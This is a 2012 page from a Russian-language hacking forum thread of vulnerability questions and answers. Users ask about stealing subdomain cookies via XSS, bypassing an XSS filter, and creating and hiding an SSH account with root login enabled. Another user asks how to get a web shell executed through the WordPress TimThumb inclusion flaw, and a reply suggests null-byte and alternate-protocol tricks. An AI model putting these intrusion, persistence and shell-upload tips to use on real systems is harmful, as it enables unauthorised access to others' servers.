HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20801  
Старый 10.06.2012, 02:51
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
По умолчанию

Возможно ли с помощью XSS получить куки с другого под домена?

(need.site.com)

В данной ситуации :

Цитата:
Сообщение от None  
.site.com PHPSID=*****************
xss.site.com PHPSID=2****************
need.site.com PHPSID=3****************; login=123; pass=123
 
Ответить с цитированием

  #20802  
Старый 12.06.2012, 07:20
4otkii
Guest
Сообщений: n/a
Провел на форуме:
350

Репутация: 0
По умолчанию

Здравствуйте, возможно ли обойти фильтр XSS если никакие символы не фильтруются, кроме как если за "
 
Ответить с цитированием

  #20803  
Старый 12.06.2012, 19:58
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию

Как создать учетную запись в ssh срочно !
 
Ответить с цитированием

  #20804  
Старый 12.06.2012, 20:01
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Groove  
Groove said:
Как создать учетную запись в ssh срочно !
sudo useradd noob

sudo passwd noob

***** (тут пасс)
 
Ответить с цитированием

  #20805  
Старый 12.06.2012, 20:08
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
sudo useradd noob
sudo passwd noob
***** (тут пасс)
куда это прописывать ?
 
Ответить с цитированием

  #20806  
Старый 12.06.2012, 20:09
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Groove  
Groove said:
куда это прописывать ?
что значит куда? у тя же терминал открытый через ssh, вводи эти команды под рутом

если ты имеешь ввиду создание пользователя у которого будет доступ к ssh, то по дефолту у всех пользователей кроме рута есть доступ к ssh, чтобы работать под рутом поправь файл

/etc/ssh/sshd_config

PermitRootLogin no -> PermitRootLogin yes
 
Ответить с цитированием

  #20807  
Старый 12.06.2012, 20:35
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
что значит куда? у тя же терминал открытый через ssh, вводи эти команды под рутом
если ты имеешь ввиду создание пользователя у которого будет доступ к ssh, то по дефолту у всех пользователей кроме рута есть доступ к ssh, чтобы работать под рутом поправь файл
/etc/ssh/sshd_config
PermitRootLogin
no
-> PermitRootLogin
yes
А как спрятать учетку ?
 
Ответить с цитированием

  #20808  
Старый 12.06.2012, 20:39
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Groove  
Groove said:
А как спрятать учетку ?
спрятать от кого или от чего?

в /etc/passwd все равно палится учетка

Код:
Code:
cat /etc/passwd  | awk -F: '{print $1}'
 
Ответить с цитированием

  #20809  
Старый 13.06.2012, 01:38
promarketing
Guest
Сообщений: n/a
Провел на форуме:
3814

Репутация: 0
По умолчанию

Word press TimThumb Уязвимость

/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable

Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл

Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
 
Ответить с цитированием

  #20810  
Старый 13.06.2012, 02:20
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

а ты пробовал blabla.php%00.jpg , или через temper data?

или так же заместо http://yousite.com/shell.php

так https://yousite.com/shell.php,ftp://yousite.com/shell.php?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ